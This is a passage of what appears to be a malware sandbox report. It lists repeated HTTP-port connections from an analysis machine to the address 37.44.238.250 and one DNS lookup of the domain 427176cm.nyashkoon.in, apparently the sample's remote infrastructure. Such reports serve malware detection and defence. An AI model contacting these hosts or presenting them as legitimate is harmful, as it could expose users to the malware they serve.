                                        Nov 5, 2024 08:15:42.989303112 CET805020937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:42.989761114 CET5020980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:42.990037918 CET805020937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:42.990170956 CET805021037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:42.990204096 CET805020837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:42.990205050 CET5020980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:42.990232944 CET805020937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:42.990560055 CET5021080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:42.990560055 CET5021080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:42.993103027 CET805020937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:42.993151903 CET805020837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:42.995532036 CET805021037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:42.995655060 CET5020980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:42.995673895 CET5020880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:43.349797010 CET5021080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:43.356267929 CET805021037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:43.804555893 CET805021037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:43.848737001 CET5021080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:43.874871016 CET805021037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:43.926836014 CET5021080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:44.007354021 CET5021180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:44.007430077 CET5015480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:44.012718916 CET805021137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:44.012792110 CET5021180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:44.012916088 CET5021180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:44.017726898 CET805021137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:44.364679098 CET5021180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:44.370224953 CET805021137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:44.824490070 CET805021137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:44.864811897 CET5021180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:45.135524035 CET805021137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:45.136142015 CET805021137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:45.137803078 CET5021180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:45.251781940 CET5021180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:45.252454042 CET5021280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:45.257081032 CET805021137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:45.257319927 CET805021237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:45.257447004 CET5021280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:45.257448912 CET5021180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:45.257715940 CET5021280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:45.262567043 CET805021237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:45.614449024 CET5021280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:45.619544983 CET805021237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:46.332475901 CET805021237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:46.332500935 CET805021237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:46.332509995 CET805021237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:46.332570076 CET5021280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:46.460295916 CET5021280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:46.461133003 CET5021380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:46.465679884 CET805021237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:46.465725899 CET5021280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:46.465941906 CET805021337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:46.465992928 CET5021380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:46.466120958 CET5021380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:46.470879078 CET805021337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:46.817748070 CET5021380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:46.822949886 CET805021337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:47.309016943 CET805021337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:47.369744062 CET5021380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:47.381144047 CET805021337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:47.396689892 CET5021380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:47.396697998 CET5021480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:47.401714087 CET805021437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:47.402091980 CET805021337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:47.405817032 CET5021380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:47.405819893 CET5021480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:47.405930042 CET5021480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:47.410888910 CET805021437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:47.505806923 CET5021480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:47.506791115 CET5021580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:47.511930943 CET805021537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:47.511990070 CET5021580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:47.512125015 CET5021580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:47.517644882 CET805021537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:47.553529978 CET805021437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:47.864427090 CET5021580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:47.869406939 CET805021537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:47.997114897 CET805021437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:47.997175932 CET5021480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:48.325776100 CET805021537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:48.379925966 CET5021580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:48.397937059 CET805021537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:48.442420006 CET5021580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:48.533822060 CET5021080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:48.580833912 CET5021580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:48.580841064 CET5021680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:48.586008072 CET805021637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:48.586112022 CET5021680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:48.586355925 CET5021680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:48.586628914 CET805021537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:48.586705923 CET5021580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:48.591459036 CET805021637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:48.944761992 CET5021680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:48.991518974 CET805021637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:49.780615091 CET805021637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:49.780632019 CET805021637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:49.780646086 CET805021637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:49.780720949 CET5021680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:49.780770063 CET805021637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:49.780822039 CET5021680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:49.916565895 CET5021680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:49.918061972 CET5021780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:49.922100067 CET805021637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:49.922147989 CET5021680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:49.922986031 CET805021737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:49.923055887 CET5021780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:49.923187017 CET5021780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:49.928369045 CET805021737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:50.270653009 CET5021780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:50.275698900 CET805021737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:50.739039898 CET805021737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:50.787730932 CET5021780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:50.816824913 CET805021737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:50.864383936 CET5021780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:50.940005064 CET5021780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:50.940007925 CET5021880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:50.944968939 CET805021837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:50.945838928 CET805021737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:50.947834015 CET5021780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:50.947907925 CET5021880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:50.951725006 CET5021880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:50.956578970 CET805021837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:51.303787947 CET5021880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:51.308803082 CET805021837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:51.757915974 CET805021837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:51.801806927 CET5021880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:51.835179090 CET805021837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:51.879915953 CET5021880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:51.956991911 CET5021880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:51.957775116 CET5021980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:51.962697983 CET805021837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:51.962754011 CET5021880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:51.962760925 CET805021937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:51.962825060 CET5021980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:51.962917089 CET5021980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:51.967802048 CET805021937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:52.317495108 CET5021980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:52.322426081 CET805021937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:52.521704912 CET5021980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:52.521713972 CET5022080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:52.644028902 CET5022180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:52.754337072 CET805022037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:52.754371881 CET805022137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:52.754473925 CET5022080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:52.754475117 CET5022180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:52.754663944 CET805021937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:52.755140066 CET5021980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:52.765254974 CET5022080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:52.765374899 CET5022180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:52.770292997 CET805022037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:52.770768881 CET805022137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:53.120685101 CET5022180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:53.120815039 CET5022080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:53.125710964 CET805022137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:53.125724077 CET805022037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:53.125950098 CET805022037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:53.566102982 CET805022137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:53.578624964 CET805022037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:53.614278078 CET5022180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:53.629901886 CET5022080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:53.646162987 CET805022137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:53.651230097 CET805022037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:53.692392111 CET5022180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:53.692420959 CET5022080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:53.769978046 CET5022080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:53.770095110 CET5022180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:53.770711899 CET5022280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:53.775397062 CET805022037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:53.775448084 CET5022080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:53.775535107 CET805022237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:53.775599003 CET5022280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:53.775717974 CET5022280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:53.775732040 CET805022137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:53.775774956 CET5022180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:53.780750036 CET805022237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:54.129981041 CET5022280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:54.135078907 CET805022237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:54.596484900 CET805022237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:54.645720959 CET5022280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:54.683752060 CET805022237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:54.684295893 CET5022280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:54.690469980 CET805022237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:54.692805052 CET5022280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:54.805721045 CET5022380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:54.811012030 CET805022337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:54.811110020 CET5022380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:54.811218023 CET5022380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:54.816126108 CET805022337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:55.161716938 CET5022380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:55.166779041 CET805022337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:55.737735987 CET805022337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:55.737755060 CET805022337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:55.737763882 CET805022337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:55.737823009 CET5022380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:55.921580076 CET5022380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:55.927047968 CET805022337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:55.927118063 CET5022380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:55.927778006 CET5022480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:55.932791948 CET805022437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:55.932857990 CET5022480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:55.933844090 CET5022480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:55.938709974 CET805022437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:56.286221981 CET5022480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:56.291234970 CET805022437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:56.752895117 CET805022437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:56.803786039 CET5022480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:56.825397015 CET805022437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:56.879890919 CET5022480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:56.938203096 CET5022480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:56.939698935 CET5022580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:56.943772078 CET805022437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:56.943948984 CET5022480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:56.944679022 CET805022537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:56.944824934 CET5022580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:56.944883108 CET5022580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:56.949692965 CET805022537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:57.303757906 CET5022580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:57.308716059 CET805022537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:57.765079021 CET805022537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:57.817406893 CET5022580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:57.842223883 CET805022537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:57.893122911 CET5022580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:57.976691008 CET5022580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:57.977427959 CET5022680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:57.982110023 CET805022537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:57.982172012 CET5022580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:57.982239962 CET805022637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:57.982301950 CET5022680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:57.982418060 CET5022680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:57.987164021 CET805022637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:58.333089113 CET5022680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:58.647824049 CET5022680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:58.665692091 CET5022680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:58.665699005 CET5022780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:58.702671051 CET805022637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:58.702954054 CET805022637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:58.703167915 CET805022737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:58.703290939 CET5022780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:58.703375101 CET5022780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:58.703617096 CET805022637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:58.703701973 CET5022680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:58.708257914 CET805022737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:58.782375097 CET5022880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:58.787416935 CET805022837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:58.787525892 CET5022880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:58.787836075 CET5022880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:58.792648077 CET805022837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:59.053700924 CET5022780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:59.058881044 CET805022737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:59.058897972 CET805022737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:59.149691105 CET5022880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:59.154839993 CET805022837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:59.518640995 CET805022737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:59.567380905 CET5022780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:59.595062971 CET805022737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:59.608793974 CET805022837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:59.645535946 CET5022780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:59.661165953 CET5022880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:59.687133074 CET805022837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:59.739248991 CET5022880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:59.813764095 CET5022780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:59.813802958 CET5022880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:59.814573050 CET5022980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:59.819469929 CET805022937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:59.819482088 CET805022737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:59.819545031 CET5022780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:59.819550991 CET5022980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:59.819674969 CET5022980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:59.820317030 CET805022837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:59.820369959 CET5022880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:59.824883938 CET805022937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:00.176837921 CET5022980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:00.181898117 CET805022937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:00.640836954 CET805022937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:00.692404985 CET5022980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:00.720921040 CET805022937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:00.770513058 CET5022980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:00.843326092 CET5023080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:00.848212957 CET805023037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:00.848352909 CET5023080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:00.851711988 CET5023080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:00.856550932 CET805023037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:01.192512035 CET5023080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:01.197407961 CET805023037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:01.765459061 CET805023037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:01.765472889 CET805023037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:01.765482903 CET805023037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:01.765518904 CET5023080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:01.765543938 CET5023080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:01.894186974 CET5022980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:01.895129919 CET5023080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:01.896301985 CET5023180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:01.900321960 CET805023037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:01.900377035 CET5023080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:01.901153088 CET805023137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:01.901220083 CET5023180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:01.901349068 CET5023180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:01.906197071 CET805023137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:02.254985094 CET5023180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:02.259913921 CET805023137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:02.709002972 CET805023137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:02.784718037 CET805023137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:02.785700083 CET5023180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:02.905670881 CET5023180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:02.909668922 CET5023280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:02.911159039 CET805023137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:02.913713932 CET5023180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:02.915735006 CET805023237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:02.915958881 CET5023280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:02.916032076 CET5023280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:02.920881987 CET805023237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:03.270586967 CET5023280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:03.275513887 CET805023237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:03.719688892 CET805023237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:03.770514011 CET5023280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:03.794809103 CET805023237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:03.848622084 CET5023280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:03.911185980 CET5023280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:03.912028074 CET5023380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:03.916925907 CET805023337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:03.917001963 CET5023380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:03.917129040 CET5023380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:03.917268038 CET805023237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:03.917315006 CET5023280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:03.921960115 CET805023337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:04.272012949 CET5023380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:04.279632092 CET805023337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:05.541938066 CET805023337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:05.542026997 CET805023337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:05.542066097 CET805023337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:05.542107105 CET5023380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:05.542107105 CET5023380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:05.542176962 CET805023337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:05.542220116 CET5023380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:05.542548895 CET805023337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:05.542582989 CET5023380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:10.552928925 CET5023480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:10.560163975 CET805023437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:10.560295105 CET5023480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:10.560368061 CET5023480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:10.565186024 CET805023437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:10.911190987 CET5023480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:10.916349888 CET805023437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:10.917429924 CET805023437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:11.485733986 CET805023437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:11.485795021 CET805023437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:11.485888958 CET5023480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:11.485917091 CET805023437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:11.485994101 CET5023480192.168.2.737.44.238.250

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 5, 2024 08:12:17.709104061 CET6096653192.168.2.71.1.1.1
                                        Nov 5, 2024 08:12:17.719855070 CET53609661.1.1.1192.168.2.7

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Nov 5, 2024 08:12:17.709104061 CET192.168.2.71.1.1.10xff71Standard query (0)427176cm.nyashkoon.inA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
